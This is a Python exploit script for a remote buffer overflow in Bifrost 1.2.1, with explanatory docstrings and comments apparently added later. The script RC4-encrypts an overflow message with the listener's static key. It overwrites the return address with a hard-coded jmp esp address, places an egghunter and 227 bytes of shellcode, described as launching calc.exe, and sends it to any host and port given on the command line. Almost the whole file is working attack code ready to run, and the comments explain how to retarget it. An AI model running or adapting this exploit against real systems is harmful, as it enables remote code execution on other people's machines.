# Title : Bifrost 1.2.1 - Remote Buffer OverFlow
# Published : 2013-06-30
# Author :
#!/usr/bin/python2.7
#By : Mohamed Clay
import socket
from time import sleep
from itertools import izip, cycle
import base64
import sys
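def rc4crypt(data, key):
    """Encrypt or decrypt *data* with RC4 under *key* (symmetric: apply twice to undo).

    Textbook RC4 (key-scheduling followed by the keystream generator) over
    one-character strings: every byte of *key* feeds the schedule and the
    result is a str of the same length as *data*.

    RC4 is used here only because it is what the Bifrost listener speaks on
    the wire (with the static key this script hard-codes); it is a broken
    cipher and must not be reused as a security primitive elsewhere.

    Args:
        data: plaintext or ciphertext, as a str of single-byte characters.
        key: cipher key as a non-empty str.
    Returns:
        The RC4 keystream XORed into *data*, as a str.
    Raises:
        ZeroDivisionError: if *key* is empty (``i % len(key)``).
    """
    # Key-scheduling: permute the 0..255 identity box by the key bytes.
    # list(range(...)) keeps the box mutable on Python 3 as well as 2.7,
    # where the original relied on range() returning a list.
    box = list(range(256))
    j = 0
    for i in range(256):
        j = (j + box[i] + ord(key[i % len(key)])) % 256
        box[i], box[j] = box[j], box[i]
    # Keystream generation: one output byte per input byte.
    i = 0
    j = 0
    out = []
    for char in data:
        i = (i + 1) % 256
        j = (j + box[i]) % 256
        box[i], box[j] = box[j], box[i]
        out.append(chr(ord(char) ^ box[(box[i] + box[j]) % 256]))
    return ''.join(out)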
def bif_len(s):
    """Right-pad the hex-digit length string *s* with "00" until it is at least 8 characters.

    Padding is added two characters at a time, so an odd-length input ends
    up 9 characters long rather than 8; ``header`` only consumes the leading
    digits. Strings already 8 characters or longer are returned unchanged.

    Args:
        s: hex digits of the payload length, without the ``0x`` prefix.
    Returns:
        *s* followed by as many "00" pairs as the original loop would add.
    """
    # Number of "00" pairs the while-loop would append: ceil((8 - len) / 2),
    # which is zero or negative (-> no padding) once len(s) >= 8.
    missing_pairs = (9 - len(s)) // 2
    return s + "00" * missing_pairs
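def header(s):
    """Convert the first eight hex digits of *s* into four raw bytes.

    Digit pairs are converted in order, so "2b0c0000" becomes the bytes
    2b 0c 00 00: the most significant length byte goes on the wire first.

    The original read the fourth pair as ``s[5]+s[6]`` (overlapping the third
    pair) instead of ``s[6]+s[7]``; this version uses the intended pairs.
    For the lengths this exploit produces (four hex digits zero-padded by
    ``bif_len``) both forms yield identical bytes, so the wire format is
    unchanged.

    Args:
        s: hex string of at least 8 characters (see ``bif_len``).
    Returns:
        A 4-character str of raw bytes.
    Raises:
        ValueError: if *s* has fewer than 8 characters or a pair is not hex.
    """
    if len(s) < 8:
        raise ValueError("header needs at least 8 hex digits, got %r" % (s,))
    # chr(int(.., 16)) works on 2.7 and 3 without str.decode("hex").
    return "".join(chr(int(s[i:i + 2], 16)) for i in range(0, 8, 2))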
def random():
    """Return eight "|"-terminated fields of 1000 "A" characters (8008 bytes of filler).

    Despite the name nothing here is random: it is fixed padding appended
    after the payload fields so the message has the expected number of
    "|"-separated fields.
    """
    field = "A" * 1000 + "|"
    return field * 8
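def usage():
    """Print the banner and command-line synopsis to stdout.

    Restores the escape sequences that were mangled to ``nnt``/``t``/``nn``
    in the published copy. The single-argument ``print(...)`` form behaves
    the same under Python 2.7 (parenthesised expression) and Python 3.
    """
    print("\n\n\t***************************")
    print("\t* By : Mohamed Clay *")
    print("\t* Bifrost 1.2.1 Exploit *")
    print("\t***************************\n")
    print("\t Usage : ./bifrost1.2.1 host port")
    print("\tExample : ./bifrost1.2.1 192.168.1.10 81\n\n")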
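# Command line: exactly <host> <port>; anything else prints usage and exits.
if len(sys.argv) != 3:
    usage()
    # sys.exit(1) instead of the bare exit(): that name is a site-module
    # convenience and, called without arguments, reported success (status 0).
    sys.exit(1)
HOST = sys.argv[1]
PORT = int(sys.argv[2])  # a non-numeric port raises ValueError, as before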
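# --- target-specific constants (escape sequences restored from the mangled
# --- published copy, where every "\x" had lost its backslash) -------------
# Static RC4 key the Bifrost 1.2.1 listener uses on the wire. It is not a
# secret we chose; it is what the server expects, and it is the same for
# every install, so anyone on the network path can decrypt this traffic.
key = "\xA3\x78\x26\x35\x57\x32\x2D\x60\xB4\x3C\x2A\x5E\x33\x34\x72\x00"
xor = "\xB2\x9C\x51\xBB"  # we need this in order to bypass 0046A03E function
# jmp esp in User32.dll. A fixed address for the author's Windows build; it is
# not ASLR/version independent and must be re-resolved for any other target.
eip = "\x53\x93\x3A\x7E"
# 32-byte egghunter: walks memory looking for the "w00tw00t" tag (the
# mov eax, "w00t" is the \xB8\x77\x30\x30\x74 below) and jumps past it. The
# page probe is syscall based (int 0x2e with eax=2), so it is Windows-specific.
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
             "\xEF\xB8\x77\x30\x30\x74\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
# calc.exe shellcode (badchars "\x00"), 227 bytes, placed right after the egg.
# Proof-of-concept payload only; the leading bytes look like an encoder/GetPC
# stub (fnstenv), so a replacement payload must also avoid \x00 -- TODO confirm.
buf = ("\xb8\x75\xd3\x5c\x87\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9"
       "\xb1\x33\x31\x43\x12\x83\xeb\xfc\x03\x36\xdd\xbe\x72\x44"
       "\x09\xb7\x7d\xb4\xca\xa8\xf4\x51\xfb\xfa\x63\x12\xae\xca"
       "\xe0\x76\x43\xa0\xa5\x62\xd0\xc4\x61\x85\x51\x62\x54\xa8"
       "\x62\x42\x58\x66\xa0\xc4\x24\x74\xf5\x26\x14\xb7\x08\x26"
       "\x51\xa5\xe3\x7a\x0a\xa2\x56\x6b\x3f\xf6\x6a\x8a\xef\x7d"
       "\xd2\xf4\x8a\x41\xa7\x4e\x94\x91\x18\xc4\xde\x09\x12\x82"
       "\xfe\x28\xf7\xd0\xc3\x63\x7c\x22\xb7\x72\x54\x7a\x38\x45"
       "\x98\xd1\x07\x6a\x15\x2b\x4f\x4c\xc6\x5e\xbb\xaf\x7b\x59"
       "\x78\xd2\xa7\xec\x9d\x74\x23\x56\x46\x85\xe0\x01\x0d\x89"
       "\x4d\x45\x49\x8d\x50\x8a\xe1\xa9\xd9\x2d\x26\x38\x99\x09"
       "\xe2\x61\x79\x33\xb3\xcf\x2c\x4c\xa3\xb7\x91\xe8\xaf\x55"
       "\xc5\x8b\xed\x33\x18\x19\x88\x7a\x1a\x21\x93\x2c\x73\x10"
       "\x18\xa3\x04\xad\xcb\x80\xfb\xe7\x56\xa0\x93\xa1\x02\xf1"
       "\xf9\x51\xf9\x35\x04\xd2\x08\xc5\xf3\xca\x78\xc0\xb8\x4c"
       "\x90\xb8\xd1\x38\x96\x6f\xd1\x68\xf5\xee\x41\xf0\xd4\x95"
       "\xe1\x93\x28")

# --- message layout -------------------------------------------------------
# Fields are "|"-separated. The first field carries the overflow (saved
# return address replaced by `eip`, then a 12-byte gap, the egghunter and a
# NOP sled); the third field holds the egg tag followed by the real payload.
raw = (1000 - 533 - len(egghunter)) * "\x90"   # NOP sled filling the first field
raw2 = (1000 - 8 - len(buf)) * "\x41" + "|"    # pad the egg field to 1000 bytes

command = 30
# The first byte is the command id. chr() covers every value 0..255; the
# original hex(command)[2:].decode("hex") broke for ids below 0x10 (odd-length hex).
data = (chr(command) + "F" * 2 + " " * 511 + xor + "C" * 8 + eip + "A" * 12
        + egghunter + raw + "|" + " " * 1000 + "|"
        + "w00tw00t" + buf + raw2 + random())
out = rc4crypt(data, key)
# 4-byte length prefix derived from the plaintext length, sent unencrypted.
length_hdr = header(bif_len("%x" % len(data)))
out = length_hdr + out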
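# Deliver the single message. The socket is now closed on every path; the
# original leaked it. No reply is read, so "completed" only means the bytes
# were handed to the kernel, not that the target was actually exploited.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    s.connect((HOST, PORT))
    s.sendall(out)
finally:
    s.close()
print("\n[*] By : Mohamed Clay")
print("[*] Exploit completed\n")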